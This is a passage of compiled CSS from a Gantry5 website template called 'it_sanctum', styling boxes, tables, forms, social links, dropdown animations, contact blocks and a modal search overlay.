/* line 92, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 93, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-particle-intro .g-title, .box1.widget .g-particle-intro .g-title, .box1.g-outer-box .g-particle-intro .g-title, .box1 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 96, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-particle-intro .g-title-separator, .box1.widget .g-particle-intro .g-title-separator, .box1.g-outer-box .g-particle-intro .g-title-separator, .box1 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 103, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 104, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable, .box2.widget, .box2.g-outer-box, .box2 > .g-content {
  padding: 25px;
  border: 1px solid #ddd;
  background: #f1f1f1;
}
/* line 111, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-title, .box2.widget .g-title, .box2.g-outer-box .g-title, .box2 > .g-content .g-title {
  border-bottom: 1px solid #ddd;
  padding-bottom: 15px;
}
/* line 112, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-title:before, .box2.widget .g-title:before, .box2.g-outer-box .g-title:before, .box2 > .g-content .g-title:before, .box2.moduletable .g-title:after, .box2.widget .g-title:after, .box2.g-outer-box .g-title:after, .box2 > .g-content .g-title:after {
  display: none;
}
/* line 118, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 119, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-particle-intro .g-title, .box2.widget .g-particle-intro .g-title, .box2.g-outer-box .g-particle-intro .g-title, .box2 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 122, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-particle-intro .g-title-separator, .box2.widget .g-particle-intro .g-title-separator, .box2.g-outer-box .g-particle-intro .g-title-separator, .box2 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 129, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 130, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable, .box3.widget, .box3.g-outer-box, .box3 > .g-content {
  padding: 25px;
  background: #4f953b;
  color: #fff;
}
/* line 137, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-title, .box3.widget .g-title, .box3.g-outer-box .g-title, .box3 > .g-content .g-title {
  color: #fff !important;
  border-bottom: 1px solid #73bf5d;
  padding-bottom: 15px;
}
/* line 138, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-title:before, .box3.widget .g-title:before, .box3.g-outer-box .g-title:before, .box3 > .g-content .g-title:before, .box3.moduletable .g-title:after, .box3.widget .g-title:after, .box3.g-outer-box .g-title:after, .box3 > .g-content .g-title:after {
  display: none;
}
/* line 145, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 146, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-particle-intro .g-title, .box3.widget .g-particle-intro .g-title, .box3.g-outer-box .g-particle-intro .g-title, .box3 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 149, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-particle-intro .g-title-separator, .box3.widget .g-particle-intro .g-title-separator, .box3.g-outer-box .g-particle-intro .g-title-separator, .box3 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 153, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .button, .box3.widget .button, .box3.g-outer-box .button, .box3 > .g-content .button {
  background: #282828;
}
/* line 155, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .button:hover, .box3.widget .button:hover, .box3.g-outer-box .button:hover, .box3 > .g-content .button:hover {
  background: #424242;
}
/* line 159, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable a, .box3.widget a, .box3.g-outer-box a, .box3 > .g-content a {
  color: #ddd;
}
/* line 161, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable a:hover, .box3.widget a:hover, .box3.g-outer-box a:hover, .box3 > .g-content a:hover {
  color: #d0d0d0;
}
/* line 168, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 169, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable, .box4.widget, .box4.g-outer-box, .box4 > .g-content {
  padding: 25px;
  background: #282828;
  color: #fff;
}
/* line 176, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-title, .box4.widget .g-title, .box4.g-outer-box .g-title, .box4 > .g-content .g-title {
  color: #fff !important;
  border-bottom: 1px solid #424242;
  padding-bottom: 15px;
}
/* line 177, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-title:before, .box4.widget .g-title:before, .box4.g-outer-box .g-title:before, .box4 > .g-content .g-title:before, .box4.moduletable .g-title:after, .box4.widget .g-title:after, .box4.g-outer-box .g-title:after, .box4 > .g-content .g-title:after {
  display: none;
}
/* line 184, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 185, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-particle-intro .g-title, .box4.widget .g-particle-intro .g-title, .box4.g-outer-box .g-particle-intro .g-title, .box4 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 188, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-particle-intro .g-title-separator, .box4.widget .g-particle-intro .g-title-separator, .box4.g-outer-box .g-particle-intro .g-title-separator, .box4 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 192, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 193, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .button:hover, .box4.widget .button:hover, .box4.g-outer-box .button:hover, .box4 > .g-content .button:hover {
  background: #63b84b;
}
/* line 200, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 201, templates/it_sanctum/scss/sanctum/_variations.scss */
.shadow .g-content {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
/* line 206, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 207, templates/it_sanctum/scss/sanctum/_variations.scss */
.shadow2 .g-content {
  box-shadow: 0 0 4px rgba(0, 0, 0, 0.15);
}
/* line 212, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_variations.scss */
.disabled .g-content {
  opacity: 0.4;
}
/* line 218, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 219, templates/it_sanctum/scss/sanctum/_variations.scss */
.square .g-content {
  border-radius: none;
}
/* line 224, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 225, templates/it_sanctum/scss/sanctum/_variations.scss */
.rounded .g-content {
  border-radius: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_tables.scss */
table {
  border: 1px solid #e2e2e2;
}
/* line 5, templates/it_sanctum/scss/sanctum/_tables.scss */
th {
  background: #eaeaea;
  padding: 0.5rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_tables.scss */
td {
  padding: 0.5rem;
  border: 1px solid #e2e2e2;
}
/* line 1, templates/it_sanctum/scss/sanctum/_forms.scss */
textarea, select[multiple=multiple] {
  background-color: white;
  border: 1px solid #ddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
/* line 6, templates/it_sanctum/scss/sanctum/_forms.scss */
textarea:hover, select[multiple=multiple]:hover {
  border-color: #c4c4c4;
}
/* line 10, templates/it_sanctum/scss/sanctum/_forms.scss */
textarea:focus, select[multiple=multiple]:focus {
  border-color: #4f953b;
}
/* line 15, templates/it_sanctum/scss/sanctum/_forms.scss */
input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]), textarea {
  background-color: white;
  border: 1px solid #ddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
/* line 21, templates/it_sanctum/scss/sanctum/_forms.scss */
input[type="color"]:hover, input[type="date"]:hover, input[type="datetime"]:hover, input[type="datetime-local"]:hover, input[type="email"]:hover, input[type="month"]:hover, input[type="number"]:hover, input[type="password"]:hover, input[type="search"]:hover, input[type="tel"]:hover, input[type="text"]:hover, input[type="time"]:hover, input[type="url"]:hover, input[type="week"]:hover, input:not([type]):hover, textarea:hover {
  border-color: #c4c4c4;
}
/* line 25, templates/it_sanctum/scss/sanctum/_forms.scss */
input[type="color"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="email"]:focus, input[type="month"]:focus, input[type="number"]:focus, input[type="password"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="text"]:focus, input[type="time"]:focus, input[type="url"]:focus, input[type="week"]:focus, input:not([type]):focus, textarea:focus {
  border-color: #4f953b;
}
/* line 1, templates/it_sanctum/scss/sanctum/_error.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_error.scss */
body.outline-_error h1 {
  margin: 30px 0;
  text-align: center;
}
/* line 6, templates/it_sanctum/scss/sanctum/_error.scss */
body.outline-_error .g-offcanvas-toggle:not(.offcanvas-toggle-particle) {
  display: none;
}
/* line 1, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_social.scss */
.g-social a {
  display: inline-block;
  padding: 8px 10px;
  background: none;
  color: #959595;
  font-size: 0.9rem;
  margin-left: -4px;
  border-right: 1px solid #f0f0f0;
}
/* line 10, templates/it_sanctum/scss/sanctum/_social.scss */
.g-social a:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
/* line 14, templates/it_sanctum/scss/sanctum/_social.scss */
.g-social a:hover {
  color: #4f953b;
}
/* line 20, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 21, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 22, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-social a {
  padding: 0 10px;
  color: #959595;
  margin: 0;
  border: none;
}
/* line 27, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-social a:first-child {
  border: none;
}
/* line 30, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-social a:hover {
  color: #4f953b;
}
/* line 37, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 39, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 40, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-block:last-child .g-social {
  margin-right: -10px;
}
@media only all and (max-width: 47.938rem) {
  #g-copyright .g-block:last-child .g-social {
    margin-right: 0;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
/* line 7, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
/* line 11, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
/* line 16, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
/* line 22, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
/* line 23, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
/* line 27, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
/* line 31, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
/* line 36, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
@-webkit-keyframes g-dropdown-zoom {
  /* line 44, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
  }
  /* line 48, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-zoom {
  /* line 44, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -moz-transform: scale3d(0.8, 0.8, 0.8);
  }
  /* line 48, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-zoom {
  /* line 44, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
    -moz-transform: scale3d(0.8, 0.8, 0.8);
    -ms-transform: scale3d(0.8, 0.8, 0.8);
    -o-transform: scale3d(0.8, 0.8, 0.8);
    transform: scale3d(0.8, 0.8, 0.8);
  }
  /* line 48, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@-webkit-keyframes g-dropdown-fade-in-up {
  /* line 54, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
  }
  /* line 58, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-fade-in-up {
  /* line 54, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -moz-transform: translate3d(0, 30px, 0);
  }
  /* line 58, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-fade-in-up {
  /* line 54, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
    -moz-transform: translate3d(0, 30px, 0);
    -ms-transform: translate3d(0, 30px, 0);
    -o-transform: translate3d(0, 30px, 0);
    transform: translate3d(0, 30px, 0);
  }
  /* line 58, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 5, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-grid {
  margin-bottom: 2.3445rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-grid:last-child {
  margin-bottom: 0;
}
/* line 11, templates/it_sanctum/scss/sanctum/_contentarray.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_contentarray.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_contentarray.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-array .g-grid:last-child .g-block:last-child .g-array-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
  .g-content-array .g-grid {
    margin-bottom: 0;
  }
}
/* line 27, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 33, templates/it_sanctum/scss/sanctum/_contentarray.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-array .g-array-item {
    margin-bottom: 2.3445rem;
  }
}
/* line 39, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-image {
  margin: 0 0 15px 0;
}
/* line 43, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-item-title {
  margin: 0;
}
/* line 47, templates/it_sanctum/scss/sanctum/_contentarray.scss */
/* line 48, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details, .g-content-array .g-array-item-text, .g-content-array .g-array-item-read-more {
  margin: 15px 0 0;
}
/* line 53, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details {
  font-size: 90%;
}
/* line 56, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details > span {
  margin-right: 10px;
}
/* line 60, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-array-item-details i {
  margin-right: 5px;
}
/* line 5, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 6, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts .g-grid {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
/* line 15, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts .g-contacts-item {
  text-align: left;
}
@media only all and (max-width: 47.938rem) {
  .g-contacts .g-contacts-item {
    margin-left: 0 !important;
    margin-right: 0 !important;
    display: block !important;
  }
  /* line 21, templates/it_sanctum/scss/sanctum/_contacts.scss */
  .g-contacts .g-contacts-item:last-child {
    margin-bottom: 0 !important;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.vertical .g-contacts-item {
  display: block;
}
/* line 31, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 32, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 33, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-right: 35px;
}
/* line 36, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-right: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_contacts.scss */
@media only all and (max-width: 47.938rem) {
  .g-contacts.style1 .g-contacts-item {
    margin-bottom: 7px;
  }
}
/* line 48, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style1 .g-contacts-icon {
  margin-right: 5px;
}
/* line 51, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 52, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style1.vertical .g-contacts-item {
  margin-bottom: 7px;
}
/* line 54, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style1.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
/* line 60, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 61, templates/it_sanctum/scss/sanctum/_contacts.scss */
@media only all and (max-width: 47.938rem) {
  .g-contacts.style2 .g-contacts-item {
    margin-bottom: 25px;
  }
  /* line 65, templates/it_sanctum/scss/sanctum/_contacts.scss */
  /* line 66, templates/it_sanctum/scss/sanctum/_contacts.scss */
  .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
    margin-top: 0 !important;
  }
}
/* line 71, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contacts-item.g-block {
  align-self: center;
}
/* line 75, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 76, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 77, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 78, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2.horizontal .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: -5px;
}
/* line 84, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contacts-icon {
  float: left;
  border: 2px solid #ddd;
  border-radius: 50%;
  font-size: 18px;
  height: 45px;
  line-height: 45px;
  text-align: center;
  width: 45px;
  color: #4f953b;
}
/* line 94, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contacts-icon > span {
  position: relative;
  top: -1px;
}
/* line 99, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-title-value-container {
  margin-left: 60px;
}
/* line 102, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2 .g-contact-title {
  margin-top: -5px;
  margin-bottom: 0;
}
/* line 106, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 107, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2.vertical .g-contacts-item {
  margin-bottom: 25px;
}
/* line 109, templates/it_sanctum/scss/sanctum/_contacts.scss */
.g-contacts.style2.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
/* line 118, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 119, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 120, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item {
  display: inline-block;
  padding: 11px 15px;
  border-right: 1px solid #fff;
  margin-left: -4px;
  margin-bottom: 0;
}
/* line 126, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item:first-child {
  border-left: 1px solid #fff;
  margin-left: 0;
}
/* line 130, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item:last-child {
  margin-right: 0;
}
/* line 133, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-top .g-contacts .g-contacts-item > a {
  color: #959595;
}
/* line 144, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 145, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 146, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts .g-contacts-item {
  margin-left: 0 !important;
  margin-right: 0 !important;
  display: block !important;
}
/* line 150, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts .g-contacts-item:last-child {
  margin-bottom: 0 !important;
}
/* line 154, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 155, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts.style1 .g-contacts-item {
  margin-bottom: 7px;
}
/* line 159, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 160, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts.style2 .g-contacts-item {
  margin-bottom: 25px;
}
/* line 162, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 163, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: 0 !important;
}
/* line 169, templates/it_sanctum/scss/sanctum/_contacts.scss */
#g-offcanvas .g-contacts .g-block {
  -webkit-flex-grow: 0;
  -moz-flex-grow: 0;
  flex-grow: 0;
  -ms-flex-positive: 0;
  -webkit-flex-basis: 100%;
  -moz-flex-basis: 100%;
  flex-basis: 100%;
  -ms-flex-preferred-size: 100%;
}
/* line 177, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 178, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 179, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 180, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] #g-top .g-contacts .g-contacts-item {
  border-right: none;
  border-left: 1px solid #fff;
}
/* line 183, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] #g-top .g-contacts .g-contacts-item:first-child {
  border-right: 1px solid #fff;
}
/* line 190, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 191, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts .g-contacts-item {
  text-align: right;
}
/* line 194, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 195, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 196, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-left: 35px;
  margin-right: 0;
}
/* line 200, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-left: 0;
}
/* line 206, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 207, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.style1 .g-contacts-icon {
  margin-left: 5px;
  margin-right: 0;
}
/* line 212, templates/it_sanctum/scss/sanctum/_contacts.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.style2 .g-contacts-icon {
  float: right;
}
/* line 216, templates/it_sanctum/scss/sanctum/_contacts.scss */
[dir="rtl"] .g-contacts.style2 .g-title-value-container {
  margin-right: 60px;
  margin-left: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog {
  text-align: left;
}
/* line 6, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 7, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search form {
  margin-bottom: 0;
}
/* line 10, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
/* line 19, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 20, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-form .search-field {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
/* line 26, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
/* line 29, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-form .search-submit {
  display: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style1 .uk-modal-dialog .search-input {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
/* line 42, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 43, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search {
  background: rgba(0, 0, 0, 0.7);
}
/* line 45, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 46, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search.uk-open .uk-modal-dialog {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
/* line 49, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search.uk-open .uk-close {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
/* line 53, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog {
  padding: 0;
  border-radius: 0;
  width: 455px;
  background: none;
  box-shadow: none;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
}
/* line 61, templates/it_sanctum/scss/sanctum/_modal-search.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search form {
  margin-bottom: 0;
}
/* line 65, templates/it_sanctum/scss/sanctum/_modal-search.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #fff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
/* line 4, media/gantry5/engines/nucleus/scss/vendor/bourbon/css3/_placeholder.scss */
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-webkit-input-placeholder {
  color: #fff;
  opacity: 1;
}
